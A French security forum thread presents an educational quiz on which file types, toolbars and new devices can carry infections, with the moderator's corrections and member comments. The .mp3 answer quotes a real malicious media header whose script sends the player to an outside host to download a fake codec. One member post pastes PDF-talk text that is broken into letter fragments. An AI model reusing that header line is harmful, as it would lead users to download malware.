Aller au contenu
  • Pas encore inscrit ?

    Pourquoi ne pas vous inscrire ? C'est simple, rapide et gratuit.
    Pour en savoir plus, lisez Les avantages de l'inscription... et la Charte de Zébulon.
    De plus, les messages que vous postez en tant qu'invité restent invisibles tant qu'un modérateur ne les a pas validés. Inscrivez-vous, ce sera un gain de temps pour tout le monde, vous, les helpeurs et les modérateurs ! :wink:

Quizz Sécu 1


Gof
 Share

Quizz n°1  

142 membres ont voté

  1. 1. Q1 : Des fichiers aux extensions suivantes, quels sont ceux qui pourraient être déclencheurs d'une infection sur le système ?

    • [nom de fichier].exe
      141
    • [nom de fichier].html
      76
    • [nom de fichier].scr
      89
    • [nom de fichier].zip
      103
    • [nom de fichier].avi
      57
    • [nom de fichier].mp3
      56
    • [nom de fichier].pdf
      53
    • [nom de fichier].job
      65
    • [nom de fichier].ini
      90
    • [nom de fichier].txt
      27
    • Je ne sais pas
      1
  2. 2. Q2 : Toutes les barres d'outils sont indiscrètes...

    • Faux, seulement quelques unes douteuses et d'autres clairement infectieuses.
      34
    • Vrai, toutes les barres d'outils le sont. Mais cela ne signifie pas qu'elles sont toutes forcément infectieuses.
      100
    • Vrai, toutes les barres d'outils le sont. Cela signifie qu'elles sont toutes infectieuses finalement.
      7
    • Je ne sais pas.
      5
  3. 3. Q3 : Un matériel livré neuf est nécessairement sain et ne comporte pas d'infections...

    • Vrai, un pc neuf ne peut jamais être infecté quel qu'en soit le constructeur car les programmes viennent directement de l'éditeur.
      6
    • Faux, les procédures de fabrication des grands constructeurs sont strictes et les vérifications nombreuses et impeccables mais il n'en est pas de même pour tous.
      40
    • Faux, les publicitaires mettent des chevaux de Troie partout.
      19
    • Faux, le zéro défaut ne peut pas exister : il y a toujours des possibilités de malfaçons ou de malfaisance.
      106
    • Je ne sais pas
      3


Messages recommandés

goflm8.png

 

Quizz Sécu # 1

 

***

 

Bonjour à tous, :P

 

Nous vous proposons à travers ce Quizz en trois questions un exercice qui se veut ludique et instructif. Ce premier d'une série qui se pérennisera nous l'espérons est ouvert à tous les membres inscrits (les invités ne peuvent pas poster). Vous ne pourrez y répondre qu'une seule fois, puis seulement consulter les suggestions de réponses des autres membres. Voici comment les choses vont se passer :

  • Ce Quizz sera ouvert aux suggestions de réponse pendant une semaine. Nous ne souhaitons pas qu'il y ait de commentaires de postés d'ici là, de sorte de ne pas influencer les réponses. Ainsi, tout post dans cette période sera masqué ou supprimé.
     
     
  • A la fin de cette semaine ouverte, nous vous indiquerons alors les bonnes réponses aux questions, en commentant les tendances de celles des membres. Là tous les commentaires et interrogations seront les bienvenus bien évidemment.

A l'issue de cette correction, dimanche prochain, un nouveau Quizz de trois questions vous sera à nouveau proposé. En espérant que cet exercice vous sera à la fois plaisant et instructif. Bon Quizz Sécu. :P

Lien vers le commentaire
Partager sur d’autres sites

Bonjour à tous, :P

 

Fermeture du Quizz à 102 votants.

 

Qu'est ce que cela signifie ? Cela signifie que le Quizz reste ouvert pour ceux qui n'ont pas voté, mais qu'il ne sera pas pris en compte leurs réponses à compter de maintenant dans l'interprétation des réponses proposées.

 

D'ici une heure environ nous vous proposerons la résolution de cette première série, tous vos commentaires, remarques et suggestions seront alors les bienvenus :P

 

Toutes les roues dentées (system.png) signifieront la présence d'un lien externe à consulter. Les bonnes réponses seront colorées en vert, les mauvaises en rouge.

 

En soirée, un nouveau Quizz vous sera proposé, ouvert également pendant une semaine.

Lien vers le commentaire
Partager sur d’autres sites

goflm8.png

 

***

 

flechedroite.pngQ1 : Des fichiers aux extensions suivantes, quels sont ceux qui pourraient être déclencheurs d'une infection sur le système ?

 

Avant de commencer à aborder les bonnes et mauvaises réponses, on va partir du postulat que les associations de fichiers sur le système sont celles présentes par défaut ; c'est à dire qu'un fichier texte s'ouvre avec le Bloc-notes ou un éditeur de textes (Notepad++ par exemple), que les fichiers mp3 s'ouvrent avec un lecteur ordinaire, etc. On ne va pas considérer les cas particuliers d'associations de fichiers corrompus où l'exécution de presque n'importe-quoi déclenche une action bien précise d'un ou de fichiers (cela existe, si si !).

De même, nous ne considérerons pas le cas particulier où l'extension affichée n'est pas la véritable. C'est à dire ? Il est aisé, via la désactivation de l'affichage des fichiers et dossiers cachés avec l'option Masquer les extensions de fichiers dont le type est connu de masquer un fichier exécutable en un fichier texte ou n'importe quoi d'autre.

 

 

doncdroite.png[nom de fichier].exe

 

Vrai. Nous sommes ici en présence de fichiers exécutables (system.png Portable Executable File Format ) dont l'exécution est autonome d'une application tierce et qui est déclenchée dès le double-clic. Il est dès lors possible que tout et n'importe quoi soit exécuté, en fonction de ce qui a été codé. Pour ce type de fichiers, en effet, son exécution peut déclencher une infection sur le système.

 

Vous avez sélectionné à plus de 99% (des votants) ce type de fichiers comme pouvant être responsable du déclenchement d'une infection sur le système. Ce type de fichiers ne vous pose pas de soucis, et vous êtes conscients de ses dangers. :P Seule une personne n'a pas voté pour ce type de fichiers : est-ce par esprit de contradiction, par méconnaissance ou par erreur ? N'hésite pas à te manifester.

 

 

doncdroite.png[nom de fichier].html

 

Vrai. Que cela soit sur un site distant, ou en local sur une page sauvegardée, un fichier HTML (system.png Hypertext Markup Language) est un ensemble de données interprétées par le navigateur permettant diverses actions, dont l'affichage et l'agencement de la page. Associé à du Javascript (system.png JavaScript), l'exécution de commandes malicieuses est tout à fait possible et très courante sur la Toile. Ainsi, l'infection connue sous le nom de "Gumblar" -du nom de domaine sur lequel on était redirigé sur les premières variantes- redirige votre navigateur sur des exploits qui le compromettent afin de vous infecter. Cette infection fait beaucoup parler d'elle, car une quantité très importante de sites légitimes a été infecté par ces scripts malveillants ; généralement les responsables des sites s'en rendent compte lorsque leurs visiteurs les alertent, l'antivirus les avertissant, ou Google via le service indiquant un site compromis (system.png Daonol / Gumblar). En local, les scripts sont toujours fonctionnels, et possèdent les mêmes particularités si le système est connecté. Les exemples sont légion de codes malicieux dans des pages HTML.

 

Pour ce type de fichiers, vous n'êtes plus que 54% à considérer que ces derniers peuvent être déclencheurs d'une infection sur le système. L'unanimité ici n'est plus de mise, n'hésitez pas à poster vos commentaires.

 

 

doncdroite.png[nom de fichier].scr

 

Vrai. Les fichiers aux extensions SCR (system.png ScreenSaver) sont des fichiers Écran de veille. Ce sont des fichiers autonomes exécutables possédant leurs propres commandes d'exécutions, mais permettant à loisir de s'infecter, au même titre que les fichiers EXE.

 

Vous êtes 66% environ conscients du danger des économiseurs d'écran, soit un bon 2/3 des votants. Mais cela signifie également qu'1/3 des votants n'en mesure pas la dangerosité ; j'espère que les explications vous auront été claires. Là aussi, n'hésitez pas à commenter.

 

 

doncdroite.png[nom de fichier].zip

 

Vrai. Le ZIP est un format de compression de données ; dès lors, il est possible de compresser n'importe quel type de fichiers. Ainsi, bien souvent, l'archive ZIP n'est pas en elle-même infectieuse, mais le programme contenu dans l'archive est lui malveillant, et c'est à l'exécution de ce dernier que le mécanisme d'infection se déclenche. Il existe des vulnérabilités importantes quant au format de compression, qui permettrait à des archives infectieuses de n'être pas détectée par les antivirus. Les fichiers d'archivage (.zip, .gz, .rar, .cab, etc.) ont toujours constitué un problème pour les antivirus. En effet, un code malveillant peut être contenu dans l'archive ou dans un des fichiers qu'elle contient. Pour analyser les fichiers contenus dans une archive, il est nécessaire que l'antivirus décompresse celle-ci à l'aide de préprocesseurs spécifiques à chaque mode d'archivage.

Ces préprocesseurs de décompression font malheureusement l'objet de vulnérabilités. En particulier, un chercheur en sécurité informatique a trouvé des vulnérabilités dans quasiment toutes les passerelles d'antivirus permettant de contourner le mécanisme de vérification des archives. Concrètement, l'exploitation de la vulnérabilité permet à un code malveillant inclus dans une archive de traverser une passerelle d'antivirus. Les conséquences sont variables : si cette archive est ensuite manipulée par un utilisateur, il est possible qu'un antivirus sur le poste client réagisse lors de l'exécution du code malveillant. Par contre, si la protection antivirale ne repose que sur la passerelle, alors l'archive pourra être perçue comme sûre par les utilisateurs.

Les éditeurs d'antivirus réagissent différemment à ces problèmes : certains sortent un correctif ainsi qu'un avis de sécurité (voir par exemple avis CERTA-2009-AVI-033), d'autres font des corrections « silencieuses » (le moteur de l'antivirus est mis à jour automatiquement) ou encore choisissent de ne pas traiter cette vulnérabilité. (system.png No CERTA-2009-ACT-018).

 

Parallèlement, il existe des archives infectieuses dont le mécanisme de l'infection n'est pas effectif à l'exécution du fichier compressé, mais dès la tentative de décompression de ladite-archive. Ces chevaux de Troie sont des fichiers archivés qui ont été codés pour saboter l'utilitaire de décompression lorsqu'il essaie d'ouvrir le fichier archivé infecté. L'explosion de la bombe entraînera le ralentissement ou le plantage de l'ordinateur. Elle peut également noyer le disque avec des données inutiles. Ces bombes sont particulièrement dangereuses pour les serveurs, surtout lorsque les donnée entrantes sont traitées automatiquement au départ : dans ce cas, le serveur plantera.

Il existe trois types de bombes : en-tête incorrecte dans l'archive, données répétées et série de fichiers identiques dans l'archive.

Une archive dont l'en-tête est incorrecte ou dont les données sont corrompues peut entraîner le plantage de l'utilitaire de décompression lors de l'ouverture et du décompactage de l'archive infectée. (system.png ArcBombs).

 

Vous êtes 73% informés des dangers des archives ZIP (on aurait pu au même titre proposer d'autres formats de compressions de données). Certains n'ont peut-être pas sélectionné cette réponse, concluant que l'infection ne pouvait pas se manifester à l'ouverture de l'archive, mais à l'exécution des fichiers compressés contenus dans l'archive. Nous venons de voir, que dès l'exécution de l'archive l'infection est possible. N'hésitez pas à commenter.

 

 

doncdroite.png[nom de fichier].avi

 

Vrai. Les fichiers AVI sont des fichiers conçus pour contenir de l'audio et de la vidéo (system.png Audio Video Interleave). N'importe quel type de codecs peut être utilisé pour la compression de ces informations ; et c'est là que le bât blesse. Dès lors que le lecteur est configuré pour obtenir en ligne automatiquement les codecs nécessaires à la lecture d'un document AVI, la sécurité en pâtit et c'est une vulnérabilité exploitée par des fichiers AVI malveillants. Ainsi, pensant télécharger le codec adéquat pour lire le document, vous téléchargez le code malveillant, ce dernier s'exécutant alors sur la machine.

 

Vous n'êtes que 38% à considérer les fichiers AVI potentiellement dangereux. C'est insuffisant. Les fichiers AVI, au même titre que d'autres formats vidéos, peuvent contenir du code malicieux vous invitant (ou sans notification suivant les paramètres de configuration du lecteur associé) à télécharger de faux codecs contenant le code malveillant véritable.

 

 

doncdroite.png[nom de fichier].mp3

 

Vrai. Au même titre que les fichiers AVI, les fichiers MP3 (system.png MPEG-1/2 Audio Layer 3) souffrent de la même vulnérabilité. Il existe ainsi par exemple des infections patchant les fichiers MP3 sur le système de cette façon (exportation au format TXT du Header) :

 

<scripts >

<script Type="URLANDEXIT"

Command="http://isvbr.net?t=3"

Time="100000000" />

</Scripts>

 

Concrêtement, le fichier se lit 10 secondes ici, puis se stoppe et doit télécharger un "codec" pour pouvoir continuer la lecture. Au téléchargement dudit codec, les fichiers sont traités à nouveau par l'infection et sont de nouveau entièrement lisibles, et l'infection se cache dans votre système. Malekal morte avait rédigé un sujet relatif à cette méthode via les auteurs ZLOB (system.png Trojan.ASF.Hijacker.gen /Trojan-Downloader.WMA.GetCodec).

 

 

Ici encore, comme pour les fichiers AVI, vous n'êtes que 33% (1/3) à considérer ces fichiers comme pouvant déclencher une infection sur le système. Bien que les infections s'en prenant à ce type de fichiers soient rares, elles existent, et se rencontrent très souvent sur les réseaux d'échanges afin de les "polluer".

 

 

doncdroite.png[nom de fichier].pdf

 

Vrai. Les fichiers PDF (system.png Portable Document Format) font l'objet d'une actualité importante, si vous suivez l'actualité "sécu". Des vulnérabilités -exploitées par nombre d'infections- associées au format de Adobe ont fait cliquer beaucoup de souris sur les blogs de spécialistes. Il est aujourd'hui tout à fait possible de s'infecter en ouvrant un fichier PDF. Les failles récentes d'Adobe Reader 9 (system.png Bulletin de sécurité Adobe), corrigées depuis, permettaient d'infecter une machine en ouvrant un fichier PDF piégé, ou même en le survolant à la souris dans l'explorateur de fichiers, pour afficher une bulle d'information : la partie piégée s'activait. Consultez les travaux de Didier Stevens si cela vous intéresse (system.png PDF, system.png démonstration en vidéo sans même ouvrir le document), ou encore -en français- ce document issu du SSTIC09 (system.png Origami malicieux en PDF).

 

Là encore, vous n'êtes que 38% conscients des dangers du format PDF. Les vulnérabilités liées à ce format sont très populaires en ce moment sur la Toile, et de nombreux PDF malicieux circulent de fait. Soyez sur vos gardes.

 

 

doncdroite.png[nom de fichier].job

 

Vrai. Les fichiers à l'extension JOB sont des fichiers dont l'objet est de régenter une tâche planifiée Windows. Ce service, présent sur les différentes plate-forme windows peut ainsi exécuter n'importe quel type de fichiers, défini dans ces fichiers JOB suivant une syntaxe particulière. En soi le fichier .job n'est pas dangereux, mais il permet d'exécuter tout et n'importe quoi. De nombreuses infections exploitent ce procédé, dont l'infection bien connue LOP (sponsor par exemple de MSN/WLM+).

 

43% des votants considèrent ces fichiers comme potentiellement dangereux ; une minorité donc. J'espère que vous aurez pris conscience du risque potentiel des tâches planifiées.

 

 

doncdroite.png[nom de fichier].ini

 

Vrai. Les fichiers INI sont des fichiers généralement de configuration pour diverses applications Windows ou non. Leur exécution est normalement par défaut associée au Bloc-notes, vous permettant de l'éditer ou d'en afficher le contenu. Mais, reliquat des anciennes versions Windows, plusieurs fichiers INI sont exécutés au démarrage de Windows ; et c'est là que l'exécution d'une infection peut se déclarer si ces derniers ont été modifiés en conséquence. Ainsi, boot.ini, system.ini et win.ini sont des fichiers sensibles pouvant permettre l'exécution automatique (au démarrage de Windows) de codes malveillants. Ce procédé est encore utilisé par certaines infections, cumulé à d'autres mécanismes d'exécution.

 

Vous êtes 62% à considérer ces fichiers potentiellement dangereux. C'est une bonne surprise, je n'aurais pas cru qu'une majorité aurait pensé à ces reliquats des anciennes versions Windows permettant d'exécuter des applications quelconques au démarrage du système. Bien joué :P

 

 

doncdroite.png[nom de fichier].txt

 

Faux. Comme l'extension le laisse suggérer, les fichiers TXT sont des fichiers textes, normalement associés par défaut au Bloc-notes. Le contenu n'est pas interprété, et il n'existe pas à ma connaissance de fichiers textes stricts au sens du terme permettant d'enclencher une infection ou le mécanisme de son exécution.

 

Enfin, vous êtes presque 20% à considérer un fichier texte comme dangereux. Je serais curieux de recueillir vos commentaires afin que nous en parlions :P

Lien vers le commentaire
Partager sur d’autres sites

goflm8.png

 

***

 

flechedroite.pngQ2 : Toutes les barres d'outils sont indiscrètes...

 

 

doncdroite.pngFaux, seulement quelques unes douteuses et d'autres clairement infectieuses.

 

doncdroite.pngVrai, toutes les barres d'outils le sont. Mais cela ne signifie pas qu'elles sont toutes forcément infectieuses.

 

La bonne réponse est celle-ci. Vous êtes 73% à avoir indiqué la bonne réponse. Il est vrai qu'ici le choix entre les différentes propositions est affaire de nuances et de formulations. Regardons cela de plus près.

 

Les barres d'outils se greffent sur le navigateur, logiciel par lequel transitent toutes les adresses des sites consultés. Par cette intégration au navigateur, les barres d'outils peuvent avoir accès aux statistiques de navigation, très prisées des publicitaires (tout se paie) et certaines sont malveillantes, mais de plusieurs manières. Il y a des barres d'outils parfaitement légitimes et inoffensives, d'autres touchent à vos statistiques de navigation, et peuvent les transmettre à des tiers, d'autres peuvent afficher de la publicité, considérée comme infection en raison de la manière dont elles procèdent.

Il faut le consentement de l'utilisateur pour installer et utiliser un logiciel ; on l'obtient après lecture et validation du Contrat de Licence Utilisateur Final (CLUF, en anglais EULA, End User Agreement), que peu d'utilisateurs lisent, se contentant de le valider, évitant au passage une lecture réputée ennuyeuse.

 

L'envoi et le stockage de données est souvent mentionné, et les toolbars indiscrètes ou malicieuses s'abritent derrière leur CLUF, validé par l'utilisateur, qui en fait n'a pas fait attention, ou se trouve face à une barre d'outils proposée en option par l'installateur d'un logiciel parfaitement légitime.

 

Toutes les barres d'outils sont indiscrètes dans la mesure où elles ont des accès à votre navigation. Toutes ne poussent pas l'indiscrétion jusqu'à l'envoi de données, mais ce ne sont pas des comportements systématiquement classables comme infectieux : il n'y a pas toujours atteinte au système, ou comportement malveillant et non sollicité.

 

je vous suggère de consulter les deux liens suivants pour poursuivre la lecture :

system.png Vie Privée et Barres d'outils - Les barres d'outils, ce n'est pas automatique de Pierre Pinard
system.png Les toolbars c'est pas obligatoire ! de Malekal Morte

doncdroite.pngVrai, toutes les barres d'outils le sont. Cela signifie qu'elles sont toutes infectieuses finalement.

Lien vers le commentaire
Partager sur d’autres sites

goflm8.png

 

***

 

flechedroite.pngQ3 : Un matériel livré neuf est nécessairement sain et ne comporte pas d'infections...

 

Ici, il n'y avait pas qu'une seule bonne réponse, mais deux, car la formulation le permettait :P

 

 

doncdroite.pngVrai, un pc neuf ne peut jamais être infecté quel qu'en soit le constructeur car les programmes viennent directement de l'éditeur.

 

Vous êtes presque 4% des votants à considérer ce postulat vrai. Les programmes installés sur les PC montés par les constructeurs et assembleurs ne viennent pas directement des éditeurs (à la source bien sûr que si), mais sont dupliqués sur les machines à partir de plusieurs copies. On retrouve là par exemple les notions de Windows OEM ; c'est à dire fourni sans CD d'installation avec juste un numéro de série. Il s'agit dans cet exemple d'un même Windows réinstallé sur une série de machines de l'assembleur et dont seule la clé change (celle qui vous est fournie sur l'emballage).

 

 

doncdroite.pngFaux, les procédures de fabrication des grands constructeurs sont strictes et les vérifications nombreuses et impeccables mais il n'en est pas de même pour tous.

 

Ainsi, l'actualité a fait que les laboratoires Kaspersky soient destinataires d'un PC neuf infecté. Ce modèle avait été infecté lors de l'insertion d'une clé infectée en chaîne d'assemblage afin d'effectuer une mise à jour des pilotes INTEL. L'affaire a été médiatisée car c'était les laboratoires Kaspersky qui avaient été destinaires du produit ; mais pour combien de machines livrées avec une infection suite à une négligence ? (system.png Kaspersky conseille l'analyse antivirale des PC neufs). Vous n'avez été que 28% à considérer cette affirmation vraie ; je pense que votre regard changera sur les machines neuves à présent :P

 

 

doncdroite.pngFaux, les publicitaires mettent des chevaux de Troie partout.

 

Vous avez été 13% à considérer cette affirmation comme vraie. Sur les machines neuves livrées avec Windows et leur lot d'applications préinstallées, il y a il est vrai des liens publicitaires, quelques indiscrétions via les barres d'outils préinstallées, et quelques modules de statistiques permettant aux éditeurs de savoir si leurs produits sont désinstallés ou utilisés. Mais on ne peut pas considérer à la vue de ces observations ces machines comme infectées, c'est excessif.

 

 

doncdroite.pngFaux, le zéro défaut ne peut pas exister : il y a toujours des possibilités de malfaçons ou de malfaisance.

 

Vous avez été plus de 73% à considérer cette affirmation vraie, et vous avez raison. Au delà de la négligence rapportée par la nouvelle relative à Kasperksy et le PC que leurs laboratoires s'étaient fait livrer, il existe d'obscures marques -généralement dans le sud-est asiatique- de clés USB, disques durs externes, lecteurs MP3 qui sont infectés alors même que vous n'avez pas encore déballé le produit de son emballage. On retrouve souvent sur ses infections se propageant par supports amovibles des infections relatives aux jeux en ligne (récupération d'identifiants Wow, etc). Il s'agit là clairement de malveillance et pas de négligence ; mais il n'est pas possible aujourd'hui de savoir s'il s'agit de l'initiative d'individus ou d'une stratégie d'entreprises. La fréquence et le nombre important de supports neuf infectés doit inciter à la prudence.

 

***

 

A présent, tous les commentaires sont les bienvenus. Si vous n'êtes pas d'accord avec quelque chose, venez en discuter à la suite ; si quelque chose vous chiffonne, parlons-en. Avez-vous trouvé ce premier Quizz difficile, facile ? Intéressant, inintéressant ? Instructif ou pas ?

Lien vers le commentaire
Partager sur d’autres sites

Gof,

 

Tout d'abord, je voudrais te dire que tes réponses sont d'excellente qualité et très intéressantes, comme le laissaient du reste prévoir tes différents papiers sur Zebulon ! :P

 

Pour ouvrir les débats, j'aimerais revenir sur la Question #2 - Toutes les barres d'outils sont indiscrètes...

 

Vrai, toutes les barres d'outils le sont. Mais cela ne signifie pas qu'elles sont toutes forcément infectieuses.
Je suis totalement en accord avec ta réponse.

 

Pour juger de la "nocivité" d'une barre d'outils, on doit non seulement prendre en considération la situation actuelle mais aussi celle du futur.

 

Je pense que chacun a en tête des exemples de barres d'outils "impossible à enlever".

 

En ce moment, dans un sous-forum privé, nous discutons de ce sujet.

Quelqu'un (pas un admin) a posté un message pour suggérer une barre d'outils de façon a apporter un peu de finances et aider le propriétaire (le forum est tout récent). Le message initial fournit l'URL http://www.conduit.com/ un site qui permet de créer une barre d'outils, jolie, sympa, personnalisée, etc. pour le site avec un chouia de pub.

 

Je ne vais pas faire long mais je pose juste quelques points/questions :

- malgré les promesses du moment, une organisation peut toujours être rachetée et un acquéreur faisant fi des engagements passés ne serait pas le premier cas

- même sans parler de rachat et malgré les termes du CLUF, l'organisation peut faire évoluer ses conceptions et attacher quelques pubs à la barre puis un peu plus intrusive, puis de plus en plus... c'est dans le sens de l'histoire et il y a des exemples :P

- des barres d'outils sont ajoutées en bundle d'outils autrefois totalement gratuits et exempts, ce qui montre qu'une barre d'outils est avant tout conçue pour se faire de l'argent

Quand on commence à penser argent, il est bien tentant d'optimiser, maximiser la chose et la barre d'outils devient alors dangereuse.

 

Pour conclure, je répète qu'il ne faut pas juger de la nocivité à ce jour mais dans l'avenir et, en ce cas, beaucoup beaucoup de barres d'outils sont douteuses dans l'avenir et doivent être évitées dans le présent, même les personnalisées, sympas et gratuites d'aujourd'hui !

Enfin, pour terminer mon histoire, en accord avec nos analyses, le propriétaire du site a repoussé l'idée d'une barre d'outils.

Lien vers le commentaire
Partager sur d’autres sites

Bonsoir Gof, bonsoir à tous,

 

Je voudrais faire quelques commentaires complémentaires sur la Question #1 - Des fichiers aux extensions suivantes, quels sont ceux qui pourraient être déclencheurs d'une infection sur le système ?

 

- on remarque que toutes les extensions en question sauf .txt sont susceptibles d'être piégées.

Sans doute as-tu choisi les extensions piégeables mais il n'en demeure pas moins que beaucoup d'extensions correspondent à des fichiers potentiellement dangereux,

-1- soit que l'extension corresponde à un format encrypté comme .zip, .rar, .pdf qui gêne certains scans dans leur analyse et, dans le cas des fichiers archives, peuvent contenir ce que veut y mettre l'archiveur et, en particulier un exécutable

-2- soit que les développeurs du programme aient prévu des macro-instructions de manière à accroître les possibilités, la puissance de leur programme : j'évoque là des .xls, des .doc pour lesquels existent des possibilités de développements en VB

 

- dans tes commentaires, on parle beaucoup de failles et d'exploits.

Qui dit faille dit possibilité d'intrusion dans le système et de contournement des sécurités. Ces failles sont prises très au sérieux mais... lorsque les parades sont trouvées pour combler ladite faille, les correctifs passent par la mise à jour des programmes !

Sur le papier la faille est contrée mais encore convient-il pour l'utilisateur d'effectuer la mise à jour pour prendre les correctifs en compte.

Dans l'ensemble des programmes installés sur un ordinateur, il y a plusieurs cas de figure que j'aimerais distinguer :

--- des modules inutiles chargés au démarrage du système - si on n'y prend garde, les programmes classiques ont vite fait d'installer un module au démarrage de Windows

--- des applications qui ne servent plus, auxquelles on ne pense même plus mais peut-être ont-elles des éléments chargés en mémoire

--- des services inutiles

--- des fichiers rangés sur le disque dur, un jour, mais qui y dorment des mois et des mois

--- des applications ou des modules utilisés fréquemment

Par modules, j'entends des éléments tels que Java Runtime Environment dont on n'est pas conscient, qui ont été installés automatiquement et qui servent à de nombreux autres programmes, de manière quotidienne

Par applications, j'entends des programmes indépendants qu'on a volontairement installés mais qu'on a tendance à oublier tels que RealPlayer, Quicktime... car ils sont appelés de manière transparente lorsqu'on veut lancer tel ou tel morceau de musique ou des applications si familières qu'on les oublie telle qu'Adobe Reader pour la lecture des .PDF

--- tous les programmes fournis par Microsoft avec son système d'exploitation ou en complément.

 

Tous ces programmes, modules et compagnie, tout comme les extensions examinées dans la Question 1 sont susceptibles de contenir des défauts qu'il est important de corriger pour avoir un système sécurisé.

 

* La désinstallation ou la suppression des éléments inutiles (le nettoyage du système est un des éléments de la sécurité et un programme désinstallé, au moins, ne donnera pas lieu à exploitation de faille :P ) -

--- on commencera par faire un inventaire des éléments en mémoire en examinant ou en faisant examiner (inutile de le faire chaque mois) la liste des chargements automatiques de modules au démarrage de Windows.

Pour ça, un premier emplacement est la liste procurée par MSconfig, onglet Démarrage

Plus technique est l'examen du Gestionnaire des tâches, onglet Processus

Plus technique aussi est l'analyse de la base de registre à travers les journaux de diverses applications comme HijackThis pour ne citer que la plus connue

--- un inventaire des éléments installés en consultant la liste Ajout/Suppression de programmes

--- un inventaire des services de Services.msc ou MSconfig, onglet Services

--- la suppression des fichiers inutiles stockés sur le disque dur par exemple grâce aux utilitaires ATF-Cleaner ou TFC

 

* La mise à jour du système -

A force de le dire et de le répéter, tout internaute averti connait Microsoft Update qui procure les correctifs préparés par Microsoft pour une grande majorité de ses programmes.

Rappelons qu'un train de mises à jour MS Update est préparé chaque "Patch Tuesday" (le deuxième mardi de chaque mois - il peut y avoir des mises à jour exceptionnelles en cas d'urgence) et qu'il existe des possibilités d'automatisme, au moins pour une notification. Il ne faut pas différer la mise à jour du système.

 

* La mise à jour des autres programmes (non désinstallés) -

Vous l'aurez deviné lors de l'énumération des sortes de fichiers ci-dessus, les programmes non Microsoft utilisés fréquemment sont à tenir absolument à jour : Adobe Reader, Java Runtime Environment, RealPlayer, Quicktime et autres.

 

* Autres mises à jour et autres pièges -

Enfin, il convient de surveiller beaucoup d'autres fichiers fréquemment oubliés mais susceptibles de contenir des failles exploitables

--- comme par exemple les pilotes (ce sont des petits programmes qui assurent l'interface entre des périphériques et le système, les périphériques pouvant être matériels comme une imprimante ou logiciels comme le réseau (même s'il y a du matériel quelque part).

--- des éléments piégeux sont constitués par ces programmes qui ne s'annulent pas comme les Adobe Reader qui, au moins par le passé, s'installaient dans le système en y laissant la version antérieure ; dans cette catégorie, il y a également les JRE-Java Runtime Environment qui se retrouvent en de multiples exemplaires dans Ajout/Suppression de programmes (allez voir).

Ne sont-ils pas piégeux ces programmes qu'on croit mettre soigneusement à jour et qui, en fait, laissent subsister les versions anciennes et donc, les failles anciennes ???

--- il existe des programmes spécialisés dans la vérification des mises à jour, je pense à Secunia Software Inspector mais il y en a d'autres

 

N'hésitez pas à faire examiner votre système par les spécialistes sur nos forums et outre la sécurisation, vous aurez la satisfaction, par ces nettoyages du système, de constater que vous récupérez de l'énergie pour votre ordi ! :P

Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

 

A la fin de cette semaine ouverte, nous vous indiquerons alors les bonnes réponses aux questions, en commentant les tendances de celles des membres. Là tous les commentaires et interrogations seront les bienvenus bien évidemment.
Vous pouvez poster dans ce quizz, puisqu'il est terminé. :P

Pas de questions, précisions, etc ?

Lien vers le commentaire
Partager sur d’autres sites

Bonjour à tous,

 

Pour illustrer la "dangerosité" des fichiers .PDF, voici ce que je trouve dans le magazine informatique Windows News de mai 2009 (le texte en est grandement modifié) :

 

PDF : Le format pour les futurs virus ?

 

C'est du moins l'avis des experts de l'OSSIR-Observatoire des Systèmes d'Information et des Réseaux qui l'ont détaillé dans une récente conférence sur le sujet

-> Origami malicieux en PDF, PDF de 84 pages par Frédéric Raynal et Guillaume Delugré de Sogeti/ESEC

1991 PDF 1.0: premi
è
re ver
s
ion

1994 PDF 1.1: lien
s
, chiffrement, commentaire
s

1996 PDF 1.2: formulaire
s
, audio/video, annotation
s

1999 PDF 1.3: Java
S
cript, fichier
s
joint
s
,
s
ignature
s

2001 PDF 1.4: tran
s
parence, am
é
lioration du chiffrement

2003 PDF 1.5: couche
s

2005 PDF 1.6: moteur 3D

2007 PDF 1.7: int
é
gration de Fla
s
h, am
é
lioration de la 3D

Et la page 81 conclut :

PDF, une nouvelle menace ?

Le PDF e
s
t toujour
s
con
s
id
é
r
é
comme
s
an
s
ri
s
que par tout le monde

Le
s
PDF malicieux
s
ont (pratiquement) ind
é
pendant (
s
ic) du
s
y
s
t
è
me d
exploitation

Et
s
i on parlait de
s
reader
s

Adobe Reader
: chaque ver
s
ion po
s
s
è
de de nouvelle
s
fonctionnalit
é
s
(utile
s
?)

Le
s
truc
s
é
vident
s
s
ont pri
s
en compte . . . mai
s
pre
s
que tout e
s
t configurable au niveau de l
utili
s
ateur

S
é
curit
é
par li
s
te noire

Foxit
: de nombreu
s
e
s
fonctionnalit
é
s
s
ont
s
upport
é
e
s
. . .
s
an
s
aucune
s
é
curit
é

Preview
,
poppler
: viewer
s
minimali
s
te
s
,
s
an
s
s
upport de fonctionnalit
é
s
inutile
s

D'après leur analyse, les fichiers .PDF peuvent être mis à profit de très nombreuses façons du fait même des possibilités qu'offre ce format. En effet, les dernières versions des documents PDF incluent maintenant la prise en charge de contenus actifs (script JavaScript). Et début mars, comme pour confirmer leurs dires, une vague de malwares basée sur une faille du lecteur Acrobat a déferlé sur la toile.

Parmi les conseils prodigués par les experts en sécurité, il est dit de désactiver la prise en charge du javascript dans Acrobat Reader :

Menu Edition/Préférences/Javascript/décocher la case "Activer Acrobat JavaScript"

 

 

 

Mise à jour d'Adobe Reader : Version actuelle Adobe Reader 9.1.2 (25,7 Mo)

... attention à la proposition de barre d'outils Google "gratuite" !

... conseil : demandez s'il y a des mises à jour par

menu Aide/Rechercher les mises à jour... même si vous venez juste de télécharger à partir du site Adobe et ceci jusqu'au message : "Aucune mise à jour n'est disponible pour le moment" !

Lien vers le commentaire
Partager sur d’autres sites

Salut Gof, tous,

 

 

 

Je pense que je me suis bien fait planter :P par ce satané mp3 :P:P

 

Pour les autres comme j'ai fait le test sans tricher :P je ne connaissais pas certaines extensions d'où certaines réponses au "feeling" ... *.job et *.scr

 

Le reste ça va ... me suis pas trop ridiculisé :P

 

De toute les manières tout ce que je télécharge est passé au scan rapide d'antivir (quelque soit l'extension) , ça prend pas beaucoup de temps et ça peut pas faire de mal.

 

J'essaie aussi de tenir à jour l'ensemble des gouffres de sécurités logiciel en tout genre, OS compris cela va de soit.

 

Il n'empêche que pour l'utilisateur lambda dont je fais partie ... tenir un PC à vocation familial à jour demande quand même un certain temps et surtout une relative somme de connaissances informatiques ... ce qui n'est pas donné à tout le monde soit par ignorance soit par "après moi le déluge" ! ! !

 

 

Pour en revenir au test ... pas de question particulière ou si peut être une :

 

- pourquoi ne pas avoir inclue une extension image (jpg - bmp etc ... ) ???

